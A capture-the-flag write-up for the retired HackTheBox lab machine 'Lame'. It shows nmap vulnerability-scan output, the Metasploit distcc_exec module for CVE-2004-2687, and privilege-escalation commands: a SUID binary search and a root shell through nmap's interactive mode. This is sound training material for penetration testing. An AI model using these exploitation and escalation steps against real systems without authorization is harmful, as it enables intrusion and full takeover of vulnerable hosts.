HackTheBox – Lame

difficulty: easy
status: retired
platform: linux
ip: 10.10.10.3
URI: https://www.hackthebox.eu/home/machines/profile/1

Enumeration

Initial aim is to collect as much information about the target host as possible. --script vuln can be used to list any common vulnerabilities that nmap can discern. It appears that there are multiple services open, with distccd having a public vulnerability available.

nmap scan results

Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-31 07:40 GMT
Nmap scan report for 10.10.10.3
Host is up (0.013s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_sslv2-drown: 
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| vulners: 
|   cpe:/a:openbsd:openssh:4.7p1: 
|     	PACKETSTORM:101052	7.8	https://vulners.com/packetstorm/PACKETSTORM:101052	*EXPLOIT*
|     	CVE-2010-4478	7.5	https://vulners.com/cve/CVE-2010-4478
|     	CVE-2008-1657	6.5	https://vulners.com/cve/CVE-2008-1657
|     	SSV:60656	5.0	https://vulners.com/seebug/SSV:60656	*EXPLOIT*
|     	CVE-2017-15906	5.0	https://vulners.com/cve/CVE-2017-15906
|     	CVE-2010-5107	5.0	https://vulners.com/cve/CVE-2010-5107
|     	CVE-2010-4755	4.0	https://vulners.com/cve/CVE-2010-4755
|     	CVE-2012-0814	3.5	https://vulners.com/cve/CVE-2012-0814
|     	CVE-2011-5000	3.5	https://vulners.com/cve/CVE-2011-5000
|     	CVE-2011-4327	2.1	https://vulners.com/cve/CVE-2011-4327
|_    	CVE-2008-3259	1.2	https://vulners.com/cve/CVE-2008-3259
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
| distcc-cve2004-2687: 
|   VULNERABLE:
|   distcc Daemon Command Execution
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2004-2687
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|       Allows executing of arbitrary commands on systems running distccd 3.1 and
|       earlier. The vulnerability is the consequence of weak service configuration.
|       
|     Disclosure date: 2002-02-01
|     Extra information:
|       
|     uid=1(daemon) gid=1(daemon) groups=1(daemon)
|   
|     References:
|       https://nvd.nist.gov/vuln/detail/CVE-2004-2687
|       https://distcc.github.io/security.html
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 179.11 second

Exploitation

Since it was observed that distccd is vulnerable and a public exploit is available, this seems like a good path forward. There is also a NSE script that didn't work me sadly.

Exploit: Metasploit: exploit/unix/misc/distcc_exec

This will give a /bin/sh session as user daemon. The user flag can get obtained via /home/makis/user.txt. Basic privesc can be used to escalate to root.

Privilege Escalation

Upgrade shell: python -c "import pty;pty.spawn('/bin/bash')"

Find SUID binaries: find / -type f -perm -u=s 2>/dev/null

Nmap has SUID bit set. Use this to get an interactive shell as root:

/usr/bin/nmap --interactive
!sh
cat /root/root.txt